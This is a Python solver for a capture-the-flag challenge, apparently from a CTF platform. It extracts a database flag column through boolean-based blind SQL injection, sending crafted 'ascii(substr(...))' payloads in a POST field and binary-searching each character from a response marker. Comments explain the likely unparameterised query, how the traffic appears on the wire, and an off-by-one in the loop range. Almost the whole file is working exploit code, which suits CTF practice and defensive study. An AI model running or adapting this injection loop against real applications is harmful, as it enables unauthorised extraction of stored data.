import requests
import time
import re
# Boolean-based blind SQL injection solver for a CTF challenge instance.
# The script recovers the `flag` column of the `flag` table one character at
# a time by binary-searching each character's ASCII code through a
# true/false oracle in the HTTP response.
#
# Defender's view: the oracle presumably exists because the server places
# the `id` form field into its SQL text unparameterised (the server code is
# not shown here). Binding `id` as a typed parameter, or rejecting
# non-integer ids, would remove it. On the wire this appears as a steady run
# of POSTs to one endpoint whose `id` field contains `ascii(substr(` and
# differs only in the position and threshold numbers, about seven requests
# per recovered character.

# Target base URL: fill in the URL of your own challenge environment.
url = 'http://9650e54c-4038-4ec1-a5a2-412ac68accbe.node3.buuoj.cn'
flag = ''

# Response text that this script treats as "the injected expression was 1".
ORACLE_MARKER = 'Hello, glzjin wants a girlfriend.'

# NOTE(review): the original comment says the flag is 43 characters long,
# but range(1, 43) probes positions 1 through 42 only.
for position in range(1, 43):
    upper = 127  # upper bound of the code range being searched
    lower = 0
    # At most 127 probes per position; the search converges long before that.
    for _ in range(127):
        # Midpoint of the current window, truncated to an integer.
        midpoint = (upper + lower) // 2
        # `1^(cond)` evaluates to 0 when the character code at `position`
        # is greater than `midpoint`, and to 1 otherwise.
        payload = f'1^(ascii(substr((select(flag)from(flag)),{position},1))>{midpoint})'
        response = requests.post(url, data={'id': payload})
        time.sleep(0.1)  # pause between requests, in seconds
        # NOTE(review): any response without the marker, error pages
        # included, is read as "code > midpoint"; the status code is
        # never checked.
        if ORACLE_MARKER in str(response.content):
            upper = midpoint  # code <= midpoint
        else:
            lower = midpoint  # code > midpoint
        if upper - lower <= 1:
            flag += chr(upper)
            print(flag)
            break
print(flag)